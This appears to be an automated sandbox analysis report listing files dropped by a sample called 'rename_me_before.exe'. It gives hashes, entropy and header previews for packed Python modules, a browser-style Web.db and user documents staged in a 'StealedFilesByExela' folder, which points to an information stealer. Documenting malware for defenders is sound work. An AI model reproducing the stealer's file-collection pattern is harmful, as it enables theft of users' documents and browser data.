                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\XZXHAVGRAG\XZXHAVGRAG.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Web.db

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\VCRUNTIME140.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):109392
                                                                                                                                                                                                                                                          Entropy (8bit):6.641929675972235
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                                                                                          MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                                                                                          SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                                                                                          SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                                                                                          SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                          • Filename: PDF_Resave.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: phost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: shost.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: sppawx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: qhos.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: wsapx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: lz4wnSavmK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: WVuXCNNYG0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: dipwo1iToJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                          • Filename: Counseling_Services_Overview.docm, Detection: malicious, Browse
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_asyncio.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37144
                                                                                                                                                                                                                                                          Entropy (8bit):7.647257503514947
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jM6N/jQdkgecnskMKffKF9xQspYLyUIVOn8M5YiSyvWAMxkEu:jR0kiV3+fsBIVOn827SyMx6
                                                                                                                                                                                                                                                          MD5:C2DA8C02C14C1539C9E1AC4E928D60B0
                                                                                                                                                                                                                                                          SHA1:74F98CE6B84ACBD91FB7ACEAD1C3385E90E20BB9
                                                                                                                                                                                                                                                          SHA-256:BCD230FF2CE48F416A78D67486B5BDD4BF06DCE89C9821205D448772D4BECD0B
                                                                                                                                                                                                                                                          SHA-512:86003C5970E49D39A26C8CF41549502E19696BD30B4A8738B81E4B86EEC6B8D67DD734026CE55241B0DD6AA80F759AE20261BF82AA877C1652437422BE2723D2
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:'T.[I..[I..[I..#...[I..'H..[I..'L..[I..'M..[I..'J..[I..&H..[I.M#H..[I..[H..[I..&D..[I..&I..[I..&...[I..&K..[I.Rich.[I.........PE..d......e.........." ...#.`...........".......................................P............`..........................................J..P....I..P....@......................DK..$.......................................@...........................................UPX0....................................UPX1.....`.......R..................@....rsrc........@.......V..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_bz2.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49432
                                                                                                                                                                                                                                                          Entropy (8bit):7.8135914033786475
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:25xdYKhY/Y5bQMskWu3IVCVJv7SyhJDxhy:OxdYKS/Y5RJRIVCVJvXpy
                                                                                                                                                                                                                                                          MD5:F807854B836AB1E84FCDB11560216929
                                                                                                                                                                                                                                                          SHA1:627EF83CA0611D9CB267C72DFCCF2F0A30297D7C
                                                                                                                                                                                                                                                          SHA-256:5847649160F3F1564E26CBA88E70BD159CC5CEA08A1BF07ECD5B7796A49D259E
                                                                                                                                                                                                                                                          SHA-512:85C28890F2FA4EA6D4F295D41FFC11109D217449CD6F77EA4A901D3F681C67F1ABF59FDC5DEAD503DB99BA766D1C51EE5505E456A3B605374B00E3FF832ADD1D
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d......e.........." ...#............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_cffi_backend.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):72704
                                                                                                                                                                                                                                                          Entropy (8bit):7.910249809084461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:mmtchbmUHui4ehi47gdUCK41d34AANP8zj6V:/uhKUHuwPMO9y10P83
                                                                                                                                                                                                                                                          MD5:2443ECADDFE40EE5130539024324E7FC
                                                                                                                                                                                                                                                          SHA1:EA74AAF7848DE0A078A1510C3430246708631108
                                                                                                                                                                                                                                                          SHA-256:9A5892AC0CD00C44CD7744D60C9459F302D5984DDB395CAEA52E4D8FD9BCA2DA
                                                                                                                                                                                                                                                          SHA-512:5896AF78CF208E1350CF2C31F913AA100098DD1CF4BAE77CD2A36EC7695015986EC9913DF8D2EBC9992F8F7D48BBA102647DC5EE7F776593AE7BE36F46BD5C93
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........ ..MA.CMA.CMA.CD9MCAA.C.4.BOA.C+.#CIA.C.4.BFA.C.4.BEA.C.4.BIA.C.9.BIA.C.=.BNA.CMA.C.A.C.4.BIA.CD9KCLA.C.4.BLA.C.4!CLA.C.4.BLA.CRichMA.C........................PE..d...,..e.........." ..... .......@...R...P................................................`..........................................s..l....p.......p..........<...........ht..$....................................^..8...........................................UPX0.....@..............................UPX1..... ...P......................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_ctypes.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):59672
                                                                                                                                                                                                                                                          Entropy (8bit):7.82957734909026
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:aAUOlRrHrPcX1nBeXfeIO/h8mLwj46IVLPZp7SyIx9:alOLL0FnIXm/yk6IVLPZpo
                                                                                                                                                                                                                                                          MD5:955A3624921B140BF6ACABA5FCA4AC3B
                                                                                                                                                                                                                                                          SHA1:027E0AF89A1DBF5EF235BD4293595BBC12639C28
                                                                                                                                                                                                                                                          SHA-256:EA07594B2EEDE262D038DE13A64B76301EDFBDA11F885AFA581917B1FB969238
                                                                                                                                                                                                                                                          SHA-512:B115E83061C11AAF0A0F1131A18BE5B520C5CBC3975F5B7A1E9CEA06B0AFF7A2815165FCD1F09BA1EFCF7C185E37E84A0B6AD4EEFEA3049A369BDF46ED3D2CB7
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.....................).....).....).....).....O...............W.......c.O.....O.....O.o...O.....Rich..........................PE..d......e.........." ...#.........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_decimal.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):109336
                                                                                                                                                                                                                                                          Entropy (8bit):7.933037133644081
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:JOt51H+NnBZBmb1fZGlHc9ye/U65Qka1RkT1IJ5NrIecwgWN/xiNIVOqHC07SyiY:czanBZkGlmRc1en8R/iIVOqHC0r
                                                                                                                                                                                                                                                          MD5:D967BEA935300A9DA0CD50BF5359A6EA
                                                                                                                                                                                                                                                          SHA1:4C2FD9A31AABC90172D41979FB64385FDA79C028
                                                                                                                                                                                                                                                          SHA-256:4B312A03C3A95BD301F095AB4201E2998A3C05E52FCD16C62AB1E51341F54AF2
                                                                                                                                                                                                                                                          SHA-512:7BAA39A35BEAD863833EFD7519C761E8CD4E15B35825427CF654181534F41C9ABCDD85E017DAEB9AFEFE291D6C2741505BF7EEF30D4D25D53ADA82646857F356
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d......e.........." ...#.p...................................................0............`..........................................,..P....)....... ..........$'...........-..........................................@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_hashlib.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36632
                                                                                                                                                                                                                                                          Entropy (8bit):7.654026577022311
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:x35lZrQBDJLFSRN0cp71I6Pm9zje2pojcIVOI8a5YiSyvELAMxkE1R1:N5YbLkfzpIwm9zK1jcIVOI847SyMrxZz
                                                                                                                                                                                                                                                          MD5:BEAC22863EE05D291190B6ABF45463C0
                                                                                                                                                                                                                                                          SHA1:94CC19E31E550D7FD9743BBD74BFE0217CDDE7F9
                                                                                                                                                                                                                                                          SHA-256:C1C3856EE8E86C8E5CF2B436C1426067F99A40C0DA4CBEA4E0B52582CD7B6B5B
                                                                                                                                                                                                                                                          SHA-512:8AE651B912C0F9F2C431A4D3F1C769746F787BDD70CE53626106C903CB3F364CB1BAE7E6E2476868420ABD849A990C5604C533BC64B0EBA149F6BC36514A6F66
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(t..F'..F'..F'..'..F'u.G&..F'u.C&..F'u.B&..F'u.E&..F'..G&..F'..G&..F'..G'B.F'..K&..F'..F&..F'...'..F'..D&..F'Rich..F'................PE..d......e.........." ...#.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_lzma.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):87832
                                                                                                                                                                                                                                                          Entropy (8bit):7.91494851779059
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:0ZMcTNiSSlZFto5ChAwRYMekiq/xFQhIHFB38EtW9ue20dcwfgpPzLNLJcIVZ1Ch:kTJitRLeZq/fZH3Ns9D2WcGgthLGIVZI
                                                                                                                                                                                                                                                          MD5:872FEA740D2AE4D8B9BB2AC95059F52B
                                                                                                                                                                                                                                                          SHA1:22274E636E2EF57AD16CCF0EB49A2FF3E37BA080
                                                                                                                                                                                                                                                          SHA-256:C9A4162DF80A99E4723DD60BDF34B8FEFC4005F7865DC3E6D86833D84FA25DA2
                                                                                                                                                                                                                                                          SHA-512:F85D1B6602826B21F12A873176F7A5C857C3213AE329ED7A0B8F7D9B1A791EDC5549D8FCE3C5D2305CE40A4D8A57D9845B2956D42D374DE78D5324703D5DFA03
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T"#.5Lp.5Lp.5Lp.M.p.5Lp.IMq.5Lp.IIq.5Lp.IHq.5Lp.IOq.5LpnHMq.5Lp.MMq.5Lp.5Mp.5LpnHAq.5LpnHLq.5LpnH.p.5LpnHNq.5LpRich.5Lp................PE..d......e.........." ...#. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_multiprocessing.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27416
                                                                                                                                                                                                                                                          Entropy (8bit):7.512035788996596
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Sy6HNbprWpwDXIVWt835YiSyvE+OAMxkEO:y99DXIVWt8p7Sy18xK
                                                                                                                                                                                                                                                          MD5:EAAADF40DD833D09BC92D6222AEB2F14
                                                                                                                                                                                                                                                          SHA1:CFE29566262367FCF7822DE328AF95B386D96A2D
                                                                                                                                                                                                                                                          SHA-256:F7D615C6FC3AC5201AB2B369FD7E0443967DC132EE5FC981ACB07BF8DC4697CB
                                                                                                                                                                                                                                                          SHA-512:8216324A30CC66B7BC51C4A96CE0B8F5AD563025E59CF1BF457A84076DC8E8A0291C8A6FCE6DC19EC3877D2DBAA9BBAF5CC1D34553FD3423A258B51EA4D40F70
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-*.yCy.yCy.yCy...y.yCy'.Bx.yCy'.Fx.yCy'.Gx.yCy'.@x.yCyA.Bx.yCy.yBy.yCy..Bx.yCyA.Nx.yCyA.Cx.yCyA..y.yCyA.Ax.yCyRich.yCy................PE..d......e.........." ...#.0..........`.....................................................`.........................................4...`....................`......................................................p...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_overlapped.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):33048
                                                                                                                                                                                                                                                          Entropy (8bit):7.646550525853649
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:C1y7LmeBIEqqupNjRIVXtM75YiSyvw5AMxkEfEk:XvmeBI9jRIVXtMF7Sy4hxjEk
                                                                                                                                                                                                                                                          MD5:DBE30CE23B5F19E1B6516653BC6692FC
                                                                                                                                                                                                                                                          SHA1:9E46EA221793EAB9256E7425C8143323640259E1
                                                                                                                                                                                                                                                          SHA-256:67D476307C3AE5FFD221C67F26FC76CE2CF5B97B91F32028A7549D131E33454A
                                                                                                                                                                                                                                                          SHA-512:2B0F9E2E0DCE0E87E240ACF874E0399249C6BAA35382D50D2F68989942E81D038D5BB9B734B313339C9F2DF175A8319683671EA58997097AEC667597024E2338
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}!{..O(..O(..O(.d.(..O(W`N)..O(W`J)..O(W`K)..O(W`L)..O(1aN)..O(..N(..O(.dN)..O(.dK)..O(1aB)..O(1aO)..O(1a.(..O(1aM)..O(Rich..O(................PE..d......e.........." ...#.P..........p........................................ ............`.........................................x...X...............................................................................@...........................................UPX0....................................UPX1.....P.......B..................@....rsrc................F..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_queue.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):26392
                                                                                                                                                                                                                                                          Entropy (8bit):7.484232189428478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:P1ihFuym2pDjIVQU8v5YiSyvyxAMxkE44:EXmqjIVQU8B7Sy+xE4
                                                                                                                                                                                                                                                          MD5:C3CEA46D675E3F2A00F7AF212521C423
                                                                                                                                                                                                                                                          SHA1:0A7C76039E0ED61E3853C4C553BB6CFC9CBD2C7C
                                                                                                                                                                                                                                                          SHA-256:02B62AEE4867505E3D12A3ABD0288CF7A75658AC908D06F5B24FDB178094E29D
                                                                                                                                                                                                                                                          SHA-512:8D9AF1D88A2A9528096388DB3BD4FF8ADD480EF94689E851FA4C5A68EC9B97C561B2EDFC7E34061BEB7BCC26B884A0A06AF196008D8705D0284B22878C95289E
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:WX.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.L[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........PE..d......e.........." ...#.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_socket.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44312
                                                                                                                                                                                                                                                          Entropy (8bit):7.717509871918743
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wAQ8MABQVaAwmySb0TrgeBYdEpZbqIVLwJF65YiSyvTAMxkEY:wATIzwF/JbqIVLwJFY7SyLxU
